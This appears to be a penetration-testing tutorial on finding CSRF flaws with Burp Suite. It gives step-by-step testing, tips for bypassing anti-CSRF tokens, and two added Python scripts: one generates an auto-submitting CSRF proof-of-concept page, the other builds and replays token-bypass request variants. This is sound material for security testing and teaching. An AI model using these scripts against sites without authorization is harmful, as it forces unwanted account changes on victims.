👑Find CSRF

  1. Create two different user accounts on the target site: one in Firefox as the attacker (csrfattacker) and one in Chrome as the victim (csrfvictim). Using two browsers keeps the two sessions' cookies separate.

  2. Verify the email address for both accounts if the site asks for verification.

  3. Sign in to the attacker account and go to the profile/account settings page.

  4. Change the default values in those forms and submit the form.

  5. Capture the request in Burp Suite (Proxy > Intercept).

  6. Check whether an anti-CSRF token is present, either as a parameter in the body or as a custom request header.

  7. If no token is present, the site may be vulnerable to CSRF. Whether it actually is also depends on the session cookie's SameSite attribute and on any Origin/Referer check, which the remaining steps test in practice.

  8. Send the intercepted request to Repeater, then drop it in the Proxy so the original submission never reaches the server.

  9. In the Repeater tab, send the request and confirm you get a 200 response.

  10. Send it again, this time changing any value in the request.

  11. Refresh your profile and check that the value sent from Repeater was applied. If it was, the endpoint changes state without a token; the cross-site test in the next steps confirms whether that is exploitable.

  12. Build the exploit: right-click the request in Burp, choose Engagement tools > Generate CSRF PoC, and enable the "Include auto-submit script" option. Save the generated page as csrf.html.

  13. In Chrome, sign in to the csrfvictim account, then open csrf.html in a new tab. The page submits the form automatically and the information changes in the csrfvictim account. If it does not, check the session cookie's SameSite attribute: Chrome treats a cookie set without one as Lax and normally withholds it from a cross-site POST, so the PoC only carries the victim's session when the cookie is SameSite=None (or the application accepts the change over a top-level GET).

  14. To cross-verify the change, refresh the settings page in the first tab.
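A worked version of the PoC that step 12 has Burp generate, added here as an example; it is not code from the original page or from Burp. It parses a captured request and emits the same kind of auto-submitting form, so the mechanics are visible: the form posts to the target's origin, the victim's browser attaches the session cookie, and no Cookie header is copied because the attacker never has it. The host, path, parameters and cookie in CAPTURED_REQUEST are constructed sample data.

```python
"""Generate an auto-submitting CSRF proof-of-concept page from a captured request.

Added example mimicking Burp's "Generate CSRF PoC". Everything in
CAPTURED_REQUEST is constructed sample data, not from any real target.
"""
import html
from urllib.parse import parse_qsl

# Constructed sample: the state-changing request captured in step 5, as Burp shows it.
CAPTURED_REQUEST = (
    "POST /account/settings HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Cookie: session=attacker-session-cookie\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 48\r\n"
    "\r\n"
    "display_name=csrfattacker&email=a%40evil.example"
)


def parse_raw_request(raw: str):
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body params."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # parse_qsl decodes percent-encoding, so values are re-escaped for HTML below.
    params = parse_qsl(body, keep_blank_values=True)
    return method, path, headers, params


def generate_csrf_poc(raw: str, scheme: str = "https") -> str:
    """Return an HTML page that auto-submits the captured form from the attacker's origin.

    Only the method, target URL and body parameters are copied. The Cookie
    header is deliberately left out: the victim's browser supplies it.
    """
    method, path, headers, params = parse_raw_request(raw)
    method = method.upper()
    if method not in ("GET", "POST"):
        raise ValueError("HTML forms can only send GET or POST; other methods need fetch()")
    action = f"{scheme}://{headers['host']}{path}"
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(n, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for n, v in params
    )
    return f"""<html>
  <body>
  <form id="csrf" action="{html.escape(action, quote=True)}" method="{method}">
{inputs}
    <input type="submit" value="Submit request">
  </form>
  <script>document.getElementById("csrf").submit();</script>
  </body>
</html>
"""


if __name__ == "__main__":
    # python csrf_poc.py > csrf.html, then open csrf.html in the victim's browser (step 13).
    print(generate_csrf_poc(CAPTURED_REQUEST), end="")
```

The hidden-input values are HTML-escaped, so a captured value containing quotes or angle brackets cannot break out of the form. As in step 13, the page only works if the victim's session cookie is actually sent on a cross-site POST.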

-------------------------------------------------------------

Some tips to bypass CSRF tokens

  • Remove the token value, then the whole token parameter, from the request and check whether the change is still applied to the profile. If it is, the token is not being validated.

  • Replace the original token with your own custom or random string of the same length; some applications only check that a token is present, or only check its length or format.

  • Reuse an old token (from an earlier request or session) in a new request; tokens that never expire or are not tied to the session can be replayed.

  • Convert the POST request to a GET request, remove the CSRF token, and send it; some frameworks only enforce the token on POST.

  • Remove the anti-CSRF headers (for example a custom X-CSRF-Token header) from the request.

  For every tip, a 200 response alone proves nothing; confirm the bypass the same way as in step 11 by checking that the value actually changed in the profile.
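To replay the tips above systematically rather than editing the request by hand in Repeater, here is an added example that builds one variant of the captured request per tip. It is not code from the original page. The request in BASE, the parameter name csrf_token and the header name X-CSRF-Token are constructed sample values; replay() is a plain urllib sender for use only against a target you are authorized to test, and is not run by default.

```python
"""Build the token-bypass variants from the tips above and optionally replay them.

Added example, not from the original page. BASE is a constructed request;
csrf_token and X-CSRF-Token are assumed names for the app's token carriers.
"""
import secrets
import urllib.error
import urllib.request
from urllib.parse import urlencode, urlsplit, urlunsplit

# Constructed sample: the token-protected settings request as captured in Burp.
BASE = {
    "method": "POST",
    "url": "https://target.example/account/settings",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
        "X-CSRF-Token": "5f1e0c9d2b7a4e8f9a3c6d1b2e4f7a8c",  # assumed header name
    },
    "params": {
        "display_name": "csrfattacker",
        "csrf_token": "5f1e0c9d2b7a4e8f9a3c6d1b2e4f7a8c",  # assumed parameter name
    },
}
TOKEN_PARAM = "csrf_token"
TOKEN_HEADERS = ("X-CSRF-Token",)


def build_variants(base, token_param, token_headers, stale_token=None):
    """Return (name, request) pairs, one per tip. The base request is never mutated."""

    def fresh():
        return {"method": base["method"], "url": base["url"],
                "headers": dict(base["headers"]), "params": dict(base["params"])}

    variants = []
    if token_param in base["params"]:
        original = base["params"][token_param]

        v = fresh()
        v["params"][token_param] = ""
        variants.append(("empty token value", v))

        v = fresh()
        del v["params"][token_param]
        variants.append(("token parameter removed", v))

        # Same length as the real token, so a length- or format-only check still passes.
        v = fresh()
        v["params"][token_param] = secrets.token_hex((len(original) + 1) // 2)[:len(original)]
        variants.append(("random token, same length", v))

        if stale_token is not None:
            v = fresh()
            v["params"][token_param] = stale_token
            variants.append(("stale token from an earlier session", v))

    # POST -> GET: the body becomes the query string, as a method=GET form would send it, minus the token.
    v = fresh()
    v["params"].pop(token_param, None)
    v["method"] = "GET"
    v["url"] = urlunsplit(urlsplit(v["url"])._replace(query=urlencode(v["params"])))
    v["params"] = {}
    v["headers"].pop("Content-Type", None)
    variants.append(("POST converted to GET, token dropped", v))

    v = fresh()
    for name in token_headers:
        v["headers"].pop(name, None)
    variants.append(("anti-CSRF headers removed", v))
    return variants


def replay(request, session_cookie, timeout=10):
    """Send one variant with the attacker's session cookie; returns (status, body)."""
    body = urlencode(request["params"]).encode() if request["method"] == "POST" else None
    req = urllib.request.Request(request["url"], data=body, method=request["method"],
                                 headers={**request["headers"], "Cookie": session_cookie})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


if __name__ == "__main__":
    # Print the variants; pass each to replay(variant, "session=...") against an authorized target.
    for name, req in build_variants(BASE, TOKEN_PARAM, TOKEN_HEADERS, stale_token="<earlier token>"):
        print(f"{name}: {req['method']} {req['url']}")
        print(f"  headers={req['headers']} params={req['params']}")
```

A 200 from replay() is only a hint; as in step 11, confirm a bypass by fetching the profile afterwards and checking that the value actually changed.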
